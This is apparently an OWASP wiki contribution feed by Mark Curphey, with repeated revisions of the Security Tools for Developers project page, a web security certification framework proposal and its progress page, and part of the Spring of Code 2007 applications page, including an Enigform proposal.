&lt;br /&gt;
*August - Project Planning &lt;br /&gt;
*September - Sprint 1 &lt;br /&gt;
*October - Sprint 2 &lt;br /&gt;
*November - Sprint 3 &lt;br /&gt;
*December - Sprint 4&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; __NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mcurphey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Owasp_std.png&amp;diff=114881</id>
		<title>File:Owasp std.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Owasp_std.png&amp;diff=114881"/>
				<updated>2011-07-31T19:27:16Z</updated>
		
		<summary type="html">&lt;p&gt;Mcurphey: OWASP STD Project Banner&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;OWASP STD Project Banner&lt;/div&gt;</summary>
		<author><name>Mcurphey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&amp;diff=114880</id>
		<title>OWASP Security Tools for Developers Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&amp;diff=114880"/>
				<updated>2011-07-31T19:04:31Z</updated>
		
		<summary type="html">&lt;p&gt;Mcurphey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==== Home  ====&lt;br /&gt;
&lt;br /&gt;
{| width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! width=&amp;quot;66%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
|- valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| &lt;br /&gt;
This project is focused on defining, designing, developing and configuring security tools for software development teams and their end-to-end software development process. While any reference material or code produced will be focused on an open source stack and Agile development techniques,&amp;amp;nbsp;the concepts should be able to be easily applied to other styles of software engineering.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Most people accept that tools can only effectively be applied to a fraction of software issues, where that fraction is generally increasing but at a relatively conservative pace. Tools are, however, an important and widely adopted part of the process needed to produce functional, stable, reliable and scalable software, where security is one such attribute.&amp;amp;nbsp;Most development teams invest heavily in tools to improve their process and maintain end-to-end development environments, including managing requirements and user stories, IDEs, test management, source code management, version control, continuous integration, deployment and monitoring. &lt;br /&gt;
&lt;br /&gt;
Many security tools today are written by and for security people who often (understandably)&amp;amp;nbsp;have a different lens and different needs from software developers and development teams. &lt;br /&gt;
&lt;br /&gt;
This project is operating under the belief that infusing security into the development teams' workflow through effective tools will have a significant impact on improving the security quality of the code they produce.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
You can think of it as a project for developers by developers that just so happens to be about security.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
[[Image:Asvs-ad-where-at.png]] &lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
|- valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| &lt;br /&gt;
== Wanna get involved?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]'''....join the discussion''' &lt;br /&gt;
&lt;br /&gt;
While the project is open to all, we are particularly looking for developers who will actively contribute code. We are especially interested in any developers that have experience of customizing Jenkins, extending Git, unit testing frameworks or customizing management tools like ScrumDo. We are also interested in any developers interested in extending behaviour driven development testing frameworks like Cucumber.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Join the mailing list, hang out and say hi or contact the project leader&amp;amp;nbsp;[mailto:mark@curphey.com?subject=OWASP%20STD%20Project Mark Curphey]. &lt;br /&gt;
&lt;br /&gt;
*[https://lists.owasp.org/mailman/listinfo/owasp-std mailing list (this is the main list)]&lt;br /&gt;
&lt;br /&gt;
|&lt;br /&gt;
&lt;br /&gt;
== What exactly are you producing?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]'''....the 50,000 ft plan''' &lt;br /&gt;
&lt;br /&gt;
The project is still in its infancy, but the plan is to produce the following: &lt;br /&gt;
&lt;br /&gt;
*Reference Architecture &lt;br /&gt;
*Reference Implementation&lt;br /&gt;
&lt;br /&gt;
As part of those two key areas we expect to build or customize tools and develop configuration guides for particular technologies. While we don't yet know exactly what that will include, it may include IDE plugins or extensions to common testing frameworks to make integrating security tests easier. &amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
== How are you doing this?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]&amp;amp;nbsp;'''....by being Agile of course!''' &lt;br /&gt;
&lt;br /&gt;
We are planning to run the project like an Agile software project itself by building a backlog and running sprints. We may even try and use Google Hangouts for video stand-up meetings! &lt;br /&gt;
&lt;br /&gt;
*August - Project Planning &lt;br /&gt;
*September - Sprint 1 &lt;br /&gt;
*October - Sprint 2 &lt;br /&gt;
*November - Sprint 3 &lt;br /&gt;
*December - Sprint 4&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; __NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mcurphey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&amp;diff=114879</id>
		<title>OWASP Security Tools for Developers Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&amp;diff=114879"/>
				<updated>2011-07-31T18:49:54Z</updated>
		
		<summary type="html">&lt;p&gt;Mcurphey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==== Home  ====&lt;br /&gt;
&lt;br /&gt;
{| width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! width=&amp;quot;66%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
|- valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| &lt;br /&gt;
This project is focused on defining, designing, developing and configuring security tools for software development teams and their end-to-end software development process. While any reference material or code produced will be focused on an open source stack and Agile development techniques,&amp;amp;nbsp;the concepts should be able to be easily applied to other styles of software engineering.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Most people accept that tools can only effectively be applied to a fraction of software issues, where that fraction is generally increasing but at a relatively conservative pace. Tools are, however, an important and widely adopted part of the process needed to produce functional, stable, reliable and scalable software, where security is one such attribute.&amp;amp;nbsp;Most development teams invest heavily in tools to improve their process and maintain end-to-end development environments, including managing requirements and user stories, IDEs, test management, source code management, version control, continuous integration, deployment and monitoring. &lt;br /&gt;
&lt;br /&gt;
Many security tools today are written by and for security people who often (understandably)&amp;amp;nbsp;have a different lens and different needs from software developers and development teams. &lt;br /&gt;
&lt;br /&gt;
This project is operating under the belief that infusing security into the development teams' workflow through effective tools will have a significant impact on improving the security quality of the code they produce.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
You can think of it as a project for developers by developers that just so happens to be about security.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
[[Image:Asvs-ad-where-at.png]] &lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
|- valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| &lt;br /&gt;
== Wanna get involved?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]'''....join the discussion''' &lt;br /&gt;
&lt;br /&gt;
While the project is open to all, we are particularly looking for developers who will actively contribute code. We are especially interested in any developers that have experience of customizing Jenkins, extending Git, unit testing frameworks or customizing management tools like ScrumDo. We are also interested in any developers interested in extending behaviour driven development testing frameworks like Cucumber.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Join the mailing list, hang out and say hi or contact the project leader&amp;amp;nbsp;[mailto:mark@curphey.com?subject=OWASP%20STD%20Project Mark Curphey]. &lt;br /&gt;
&lt;br /&gt;
*[https://lists.owasp.org/mailman/listinfo/owasp-std mailing list (this is the main list)]&lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
== What exactly are you producing?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]'''....the 50,000 ft plan''' &lt;br /&gt;
&lt;br /&gt;
The project is still in its infancy, but the plan is to produce the following: &lt;br /&gt;
&lt;br /&gt;
*Reference Architecture &lt;br /&gt;
*Reference Implementation&lt;br /&gt;
&lt;br /&gt;
As part of those two key areas we expect to build or customize tools and develop configuration guides for particular technologies. While we don't yet know exactly what that will include, it may include IDE plugins or extensions to common testing frameworks to make integrating security tests easier. &amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
== How are you doing this?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]&amp;amp;nbsp;'''....by being Agile of course!''' &lt;br /&gt;
&lt;br /&gt;
We are planning to run the project like an Agile software project itself by building a backlog and running sprints. We may even try and use Google Hangouts for video stand-up meetings! &lt;br /&gt;
&lt;br /&gt;
*August - Project Planning &lt;br /&gt;
*September - Sprint 1 &lt;br /&gt;
*October - Sprint 2 &lt;br /&gt;
*November - Sprint 3 &lt;br /&gt;
*December - Sprint 4&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; __NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mcurphey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&amp;diff=114878</id>
		<title>OWASP Security Tools for Developers Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&amp;diff=114878"/>
				<updated>2011-07-31T18:43:53Z</updated>
		
		<summary type="html">&lt;p&gt;Mcurphey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==== Home  ====&lt;br /&gt;
&lt;br /&gt;
{| width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! width=&amp;quot;66%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
|- valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| &lt;br /&gt;
This project is focused on defining, designing, developing and configuring security tools for software development teams and their end-to-end software development process. While any reference material or code produced will be focused on an open source stack and Agile development techniques,&amp;amp;nbsp;the concepts should be able to be easily applied to other styles of software engineering.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Most people accept that tools can only effectively be applied to a fraction of software issues, where that fraction is generally increasing but at a relatively conservative pace. Tools are, however, an important and widely adopted part of the process needed to produce functional, stable, reliable and scalable software, where security is one such attribute.&amp;amp;nbsp;Most development teams invest heavily in tools to improve their process and maintain end-to-end development environments, including managing requirements and user stories, IDEs, test management, source code management, version control, continuous integration, deployment and monitoring. &lt;br /&gt;
&lt;br /&gt;
Many security tools today are written by and for security people who often (understandably)&amp;amp;nbsp;have a different lens and different needs from software developers and development teams. &lt;br /&gt;
&lt;br /&gt;
This project is operating under the belief that infusing security into the development teams' workflow through effective tools will have a significant impact on improving the security quality of the code they produce.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
You can think of it as a project for developers by developers that just so happens to be about security.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
[[Image:Asvs-ad-where-at.png]] &lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
|- valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| &lt;br /&gt;
== Wanna get involved?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]'''....join the discussion'''&lt;br /&gt;
&lt;br /&gt;
While the project is open to all, we are particularly looking for developers who will actively contribute code. We are especially interested in any developers that have experience of customizing Jenkins, extending Git, unit testing frameworks or customizing management tools like ScrumDo. We are also interested in any developers interested in extending behaviour driven development testing frameworks like Cucumber.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Join the mailing list, hang out and say hi or contact the project leader Mark Curphey&amp;amp;nbsp;[mailto:owasp@owasp.org contact us]. &lt;br /&gt;
&lt;br /&gt;
*[https://lists.owasp.org/mailman/listinfo/owasp-std mailing list (this is the main list)]&lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
== What exactly are you producing?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]'''....the 50,000 ft plan''' &lt;br /&gt;
&lt;br /&gt;
The project is still in its infancy, but the plan is to produce the following: &lt;br /&gt;
&lt;br /&gt;
*Reference Architecture &lt;br /&gt;
*Reference Implementation&lt;br /&gt;
&lt;br /&gt;
As part of those two key areas we expect to build or customize tools and develop configuration guides for particular technologies. While we don't yet know exactly what that will include, it may include IDE plugins or extensions to common testing frameworks to make integrating security tests easier. &amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
== How are you doing this?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]&amp;amp;nbsp;'''....by being Agile of course!''' &lt;br /&gt;
&lt;br /&gt;
We are planning to run the project like an Agile software project itself by building a backlog and running sprints. We may even try and use Google Hangouts for video stand-up meetings! &lt;br /&gt;
&lt;br /&gt;
*August - Project Planning &lt;br /&gt;
*September - Sprint 1 &lt;br /&gt;
*October - Sprint 2 &lt;br /&gt;
*November - Sprint 3 &lt;br /&gt;
*December - Sprint 4&lt;br /&gt;
&lt;br /&gt;
|} &lt;br /&gt;
&lt;br /&gt;
Project About &lt;br /&gt;
&lt;br /&gt;
{{:Projects/OWASP Development Guide | Project About}} &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; __NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mcurphey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&amp;diff=114877</id>
		<title>OWASP Security Tools for Developers Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Security_Tools_for_Developers_Project&amp;diff=114877"/>
				<updated>2011-07-31T18:40:25Z</updated>
		
		<summary type="html">&lt;p&gt;Mcurphey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==== Home  ====&lt;br /&gt;
&lt;br /&gt;
{| width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! width=&amp;quot;66%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
|- valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| &lt;br /&gt;
This project is focused on defining, designing, developing and configuring security tools for software development teams and their end-to-end software development process. While any reference material or code produced will be focused on an open source stack and Agile development techniques,&amp;amp;nbsp;the concepts should be able to be easily applied to other styles of software engineering.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Most people accept that tools can only effectively be applied to a fraction of software issues, where that fraction is generally increasing but at a relatively conservative pace. Tools are, however, an important and widely adopted part of the process needed to produce functional, stable, reliable and scalable software, where security is one such attribute.&amp;amp;nbsp;Most development teams invest heavily in tools to improve their process and maintain end-to-end development environments, including managing requirements and user stories, IDEs, test management, source code management, version control, continuous integration, deployment and monitoring. &lt;br /&gt;
&lt;br /&gt;
Many security tools today are written by and for security people who often (understandably)&amp;amp;nbsp;have a different lens and different needs from software developers and development teams. &lt;br /&gt;
&lt;br /&gt;
This project is operating under the belief that infusing security into the development teams' workflow through effective tools will have a significant impact on improving the security quality of the code they produce.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
You can think of it as a project for developers by developers that just so happens to be about security.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
[[Image:Asvs-ad-where-at.png]] &lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
! width=&amp;quot;33%&amp;quot; | &lt;br /&gt;
|- valign=&amp;quot;top&amp;quot;&lt;br /&gt;
| &lt;br /&gt;
== Wanna get involved?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]'''....join the discussion'''&lt;br /&gt;
&lt;br /&gt;
While the project is open to all, we are particularly looking for developers who will actively contribute code. We are especially interested in any developers that have experience of customizing Jenkins, extending Git, unit testing frameworks or customizing management tools like ScrumDo. We are also interested in any developers interested in extending behaviour driven development testing frameworks like Cucumber.&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Join the mailing list, hang out and say hi or contact the project leader Mark Curphey&amp;amp;nbsp;[mailto:owasp@owasp.org contact us]. &lt;br /&gt;
&lt;br /&gt;
*[https://lists.owasp.org/mailman/listinfo/owasp-std mailing list (this is the main list)]&lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
== What exactly are you producing?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]]'''....the 50,000 ft plan''' &lt;br /&gt;
&lt;br /&gt;
The project is still in its infancy, but the plan is to produce the following: &lt;br /&gt;
&lt;br /&gt;
*Reference Architecture &lt;br /&gt;
*Reference Implementation&lt;br /&gt;
&lt;br /&gt;
As part of those two key areas we expect to build or customize tools and develop configuration guides for particular technologies. While we don't yet know exactly what that will include, it may include IDE plugins or extensions to common testing frameworks to make integrating security tests easier. &amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
| &lt;br /&gt;
== How are you doing this?  ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Asvs-bulb.jpg]] '''....by being Agile, of course!''' &lt;br /&gt;
&lt;br /&gt;
We are planning to run the project like an Agile software project itself, by building a backlog and running sprints. We may even try to use Google Hangouts for video stand-up meetings! &lt;br /&gt;
&lt;br /&gt;
*August - Planning&lt;br /&gt;
*September - Sprint 1&lt;br /&gt;
*October - Sprint 2&lt;br /&gt;
*November - Sprint 3&lt;br /&gt;
*December - Sprint 4&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Project About &lt;br /&gt;
&lt;br /&gt;
{{:Projects/OWASP Development Guide | Project About}} &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; __NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mcurphey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=SpoC_007_-_The_OWASP_Web_Security_Certification_Framework&amp;diff=21634</id>
		<title>SpoC 007 - The OWASP Web Security Certification Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=SpoC_007_-_The_OWASP_Web_Security_Certification_Framework&amp;diff=21634"/>
				<updated>2007-09-10T14:40:52Z</updated>
		
		<summary type="html">&lt;p&gt;Mcurphey: /* Mark Curphey – The OWASP Web Security Certification Framework */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;'''[http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Selection Back to SpoC 007 Selection page]'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''AoC Candidate''':  Mark Curphey&lt;br /&gt;
&lt;br /&gt;
'''Project coordinator''': Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
'''Project Progress''': 45% Complete, [[SpoC 007 - OWASP Web Security Certification Framework - Progress Page|Progress Page]]&lt;br /&gt;
&lt;br /&gt;
Web site owners need a widely published and consensus-driven set of criteria to design, develop, deploy and maintain secure web sites. These criteria, and claims of compliance with them, need to be available to a wide range of stakeholders including customers, regulators and business partners. &lt;br /&gt;
&lt;br /&gt;
This document is a discussion document created by Mark Curphey. It was sponsored and produced as part of the OWASP Spring of Code 2007 and proposes an evaluation and certification scheme for the security of web sites, including recommendations for how the evaluation and certification process itself could work. This work is intended to be openly published for a reasonable period of time for public discussion, debate and feedback. After this period the OWASP Board will work with interested parties to determine any appropriate next steps. These may include adoption or integration into existing standards or the creation of something new.&lt;br /&gt;
The evaluation and certification scheme proposed here takes into account the motivations and needs of a variety of stakeholders. Many people, including the author, have been highly critical of the Payment Card Industry Data Security Standard (PCI DSS). The OWASP Web Security Certification Criteria is not a proposal to replace the PCI DSS and is not officially related to it in any way, shape or form. PCI DSS has been taken into account; however, we have intentionally chosen not to build upon or around key PCI issues that we consider ill-conceived. In short, we have decided to build on solid foundations from the ground up.&lt;br /&gt;
&lt;br /&gt;
It is very important to understand that this document, and the project that supports it, is not in itself an evaluation scheme or criteria, but a proposal for what an effective one may look like. In fact the scheme has been created in such a way as to provide a framework from which domain-specific evaluation schemes (US financial services, UK Government or Indian insurance) can be derived. This document itself comprises two main parts:&lt;br /&gt;
&lt;br /&gt;
Part 1 – Implementation Considerations. This section describes key processes and how they would work in order for the evaluation and certification scheme to be effective. &lt;br /&gt;
Part 2 – Evaluation Criteria. This section describes the actual criteria being proposed.  It adopts the recommendations from Part 1.&lt;br /&gt;
You can send your feedback directly to mark@curphey.com or at the OWASP mailing list dedicated to this project (https://lists.owasp.org/mailman/listinfo/owasp-webcert).&lt;br /&gt;
We hope this document provides value and provokes thought to all those identified in the stakeholders section. &lt;br /&gt;
&lt;br /&gt;
Kind regards, Mark Curphey and the entire OWASP Project Team.&lt;/div&gt;</summary>
		<author><name>Mcurphey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=SpoC_007_-_OWASP_Web_Security_Certification_Framework_-_Progress_Page&amp;diff=21633</id>
		<title>SpoC 007 - OWASP Web Security Certification Framework - Progress Page</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=SpoC_007_-_OWASP_Web_Security_Certification_Framework_-_Progress_Page&amp;diff=21633"/>
				<updated>2007-09-10T14:39:15Z</updated>
		
		<summary type="html">&lt;p&gt;Mcurphey: New page: The OWASP Web Security Evaluation and Certification project is well underway. In fact at this point in writing I intend to fully complete the first draft by COB Friday September the 10th. ...&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;The OWASP Web Security Evaluation and Certification project is well underway. In fact at this point in writing I intend to fully complete the first draft by COB Friday September the 10th.&lt;br /&gt;
&lt;br /&gt;
So far we have met the following milestones:&lt;br /&gt;
&lt;br /&gt;
*Defined the criteria for a good standard and set out key proposals for consideration&lt;br /&gt;
*Defined the structure for a scalable scheme and built the generic framework&lt;br /&gt;
*Defined the generic controls for the technology section&lt;br /&gt;
*Defined the generic controls for the process section&lt;br /&gt;
&lt;br /&gt;
Left to do:&lt;br /&gt;
&lt;br /&gt;
*Define controls for the people section&lt;br /&gt;
*Refine all controls&lt;br /&gt;
*Configure all controls to create a reference implementation&lt;br /&gt;
&lt;br /&gt;
There are several services companies already planning to offer services around this project and several banks planning to adopt it for their 3rd party security assessment criteria. This is very encouraging!&lt;/div&gt;</summary>
		<author><name>Mcurphey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Spring_Of_Code_2007_Applications&amp;diff=17509</id>
		<title>OWASP Spring Of Code 2007 Applications</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Spring_Of_Code_2007_Applications&amp;diff=17509"/>
				<updated>2007-03-28T15:06:07Z</updated>
		
		<summary type="html">&lt;p&gt;Mcurphey: /* Mark Curphey – A Better Web Security Evaluation Criteria */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This page contains project Applications to the [[OWASP_Spring_Of_Code_2007]]&lt;br /&gt;
&lt;br /&gt;
'''If you want to apply for a SpoC 007 sponsorship you HAVE TO USE THIS PAGE for your application'''&lt;br /&gt;
&lt;br /&gt;
See [[OWASP_Spring_Of_Code_2007#How_To_Participate]] for what to do once you have completed your Application&lt;br /&gt;
&lt;br /&gt;
---------&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Proposed template:''' {for longer proposals, in addition to these details you can create a PDF}:&lt;br /&gt;
&lt;br /&gt;
== {Your first name or Alias} - {Project name} ==&lt;br /&gt;
Please remember that projects will be selected and funded based on how well they meet the [[OWASP_Spring_Of_Code_2007_:_Selection|Selection Criteria]].&lt;br /&gt;
&lt;br /&gt;
You can propose your project in any form you wish, but the best proposals will be well thought out, clear and concise, and reflective of your passion for the topic.  We strongly suggest that you include the following information in your proposal.&lt;br /&gt;
&lt;br /&gt;
* Your educational and professional background&lt;br /&gt;
&lt;br /&gt;
* Application security experience and accomplishments&lt;br /&gt;
&lt;br /&gt;
* Participation and leadership in open communities&lt;br /&gt;
&lt;br /&gt;
* The opportunity, challenges, issues or need your proposal addresses&lt;br /&gt;
&lt;br /&gt;
* Objectives or ways in which you will meet the goal(s)&lt;br /&gt;
&lt;br /&gt;
* Specific activities and who will carry out these activities&lt;br /&gt;
&lt;br /&gt;
* Specific deliverables and a rough project schedule so we can track progress&lt;br /&gt;
&lt;br /&gt;
* Long-term vision for the project&lt;br /&gt;
&lt;br /&gt;
* Any other reasons why you and your project should be selected&lt;br /&gt;
&lt;br /&gt;
== Buanzo - Enigform: Firefox Addon for OpenPGP signing of HTTP requests ==&lt;br /&gt;
&lt;br /&gt;
I am a 25-year-old independent security consultant from Buenos Aires, Argentina, who has contributed to the world of information systems security since 1994, when BBSes and Linux still lived together.&lt;br /&gt;
&lt;br /&gt;
A quick Google search for buanzo [http://www.google.com/search?hl=en&amp;amp;q=buanzo&amp;amp;btnG=Google+Search] will provide all necessary details about my professional and community background. For verifiable experience, you could also check my Rent a Coder profile [http://www.rentacoder.com/RentACoder/SoftwareCoders/showBioInfo.asp?lngAuthorId=735204].&lt;br /&gt;
&lt;br /&gt;
In my free time I like playing with my Punk-Pop band [http://www.purevolume.com/futurabandapunkpop], Futurabanda. [http://www.futurabanda.com.ar], and maintaining my Restaurants, Wines and Recipes site. [http://www.vivamoslavida.com.ar]. I have to admit that my first priorities are my beloved son [http://www.fotolog.com/buanzo] and my wonderful wife [http://www.fotolog.com/buanzo].&lt;br /&gt;
&lt;br /&gt;
=== Accomplishments ===&lt;br /&gt;
&lt;br /&gt;
I've contributed scripts, fixes and translations to the Nmap project. I've also acted as Expert Contributor for the SANS TOP-20 in 2004, 2005 and 2006. I've developed tools that can be found on Freshmeat, like mprl (a getty enhancement to allow remote logins from the login: prompt of the console). I've also written the Unix chapter of the OISSG's Information Systems Security Assessment Framework, v0.1 [http://www.oissg.org/content/view/71/71/]. I'm currently writing an Internet Draft to be proposed as an RFC regarding Enigform.&lt;br /&gt;
&lt;br /&gt;
=== Community ===&lt;br /&gt;
&lt;br /&gt;
I run the official 2600 meetings site for Argentina [http://www.2600.com/meetings/pages.html]. I have been proposed for President of the Argentinian Free Software group SOLAR [www.solar.org.ar], but I declined. I've been an active member of the FLOSS community since 1996, having written articles in magazines (http://www.net-security.org/dl/articles/Detecting_and_Understanding_rootkits.txt), made TV, radio and newspaper appearances [http://codigoabierto.bitacoras.com/archivos/2005/04/01/buanzo-hacks] and led different security research groups in Spain, Mexico and Argentina. Currently I contribute time through my sites, forums and blogs, answering questions on mailing lists and helping coordinate some local LUGs. I also manage the Linux Counter for Argentina [http://counter.li.org/reports/place.php?place=AR].&lt;br /&gt;
&lt;br /&gt;
=== My Project ===&lt;br /&gt;
&lt;br /&gt;
Enigform [http://enigform.mozdev.org] is a Firefox extension that enhances HTTP with OpenPGP functionality. It digitally signs outgoing HTTP requests so that a web server can authenticate the identity and data of the incoming request. It is a web security tool because it can, if correctly implemented, as with any OpenPGP-based technology, render man-in-the-middle attacks useless. I think OpenPGP already speaks for itself regarding e-mail. Imagine the same benefits for HTTP and web applications. I think Enigform can fit into the OWASP Validation Project [http://www.owasp.org/index.php/Category:OWASP_Validation_Project].&lt;br /&gt;
&lt;br /&gt;
Enigform is the reference implementation of the Internet Draft I'm working on, in discussion with members of the IETF's OpenPGP Working Group.&lt;br /&gt;
&lt;br /&gt;
Some simple PHP code is enough to make a web application Enigform-aware [http://enigformtest.buanzo.com.ar]. The Smutty PHP MVC Framework already supports Enigform [http://smutty.pu-gh.com/demo/enigform].&lt;br /&gt;
&lt;br /&gt;
=== Long Term ===&lt;br /&gt;
&lt;br /&gt;
Have the Draft proposed as a Standards Track RFC document, have Enigform supported directly in Apache and IIS, port Enigform to other browsers and/or programming languages, and also provide OpenPGP encryption/decryption support.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Why should I be selected ===&lt;br /&gt;
